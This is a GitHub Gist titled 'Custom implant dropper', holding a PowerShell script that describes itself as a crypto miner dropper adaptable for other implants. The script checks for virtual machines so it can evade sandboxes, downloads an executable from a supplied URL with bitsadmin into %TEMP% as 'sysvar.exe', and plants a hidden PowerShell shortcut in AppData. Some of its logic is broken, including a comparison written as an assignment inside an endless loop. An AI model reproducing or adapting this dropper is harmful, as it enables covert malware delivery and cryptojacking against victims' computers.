Created
September 2, 2018 06:41
-
-
Save decay88/1680a29f89e365766f97096c0697731e to your computer and use it in GitHub Desktop.
Custom implant dropper
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Crypto miner dropper or you can modify it to drop your implants | |
| # Read the code if you want to figure it out | |
| param( | |
| [Parameter(Position = 0)] | |
| [string[]]$Url, | |
| [string]$64Url | |
| ) | |
| $wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber | |
| $wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer | |
| $Detect = @{ | |
| ComputerName = $computer | |
| BIOSVersion = $wmibios.Version | |
| SerialNumber = $wmibios.serialnumber | |
| Manufacturer = $wmisystem.manufacturer | |
| Model = $wmisystem.model | |
| IsVirtual = $false | |
| VirtualType = $null | |
| } | |
| if ($wmibios.SerialNumber -like "*VMware*") { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - VMWare" | |
| } | |
| else { | |
| switch -wildcard ($wmibios.Version) { | |
| 'VIRTUAL' { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - Hyper-V" | |
| } | |
| 'A M I' { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - Virtual PC" | |
| } | |
| '*Xen*' { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - Xen" | |
| } | |
| } | |
| } | |
| if (-not $Detect.IsVirtual) { | |
| if ($wmisystem.manufacturer -like "*VMWare*") | |
| { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - VMWare" | |
| } | |
| } | |
| $results += New-Object PsObject -Property $Detect # " Using += Operator" | |
| while ($true) # while loop | |
| { | |
| if ($Detect.IsVirtual = $true ) | |
| { | |
| exit; # if VM detected | |
| } | |
| } | |
| $timer = [Diagnostics.Stopwatch]::StartNew() | |
| while (-not (Test-Connection www.google.com -Quiet -Count 6)) #checks if connected to internet | |
| { | |
| if ($timer.Elapsed.TotalSeconds -ge $Timeout) | |
| { | |
| exit; | |
| } | |
| else | |
| { | |
| } | |
| $os_type = (Get-WmiObject -Class Win32_OperatingSystem).OSArchitecture -match ‘(64-bit)’ | |
| if ($os_type -eq "True") | |
| { | |
| bitsadmin /transfer transaction /download /priority HIGH $url %TEMP%\sysvar.exe | |
| #wmic process call create %TEMP%\sysvar.exe --arguments (64-bit) | |
| #Creates shortcut with miner arguments | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut($env:USERPROFILE + "\AppData\Roaming\slavyana.lnk") | |
| $Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" | |
| $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
| $Shortcut.Arguments = '-windowstyle hidden /c --arguments' | |
| $Shortcut.Save() | |
| #powershell.exe -file -windowsstyle hidden ./slavyana.lnk | |
| } | |
| else | |
| { | |
| $os_type = (Get-WmiObject -Class Win32_OperatingSystem).OSArchitecture -match ‘(32-bit)’ | |
| if ($os_type -eq "True") | |
| { | |
| bitsadmin /transfer transaction /download /priority HIGH $url %TEMP%\sysvar.exe | |
| #wmic process call create %TEMP%\sysvar.exe --arguments (32-bit) | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut($env:USERPROFILE + "\AppData\Roaming\slavyana.lnk") | |
| $Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" | |
| $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
| $Shortcut.Arguments = '-windowstyle hidden /c --arguments' | |
| $Shortcut.Save() | |
| # powershell.exe -file -windowsstyle hidden ./slavyana.lnk | |
| } | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment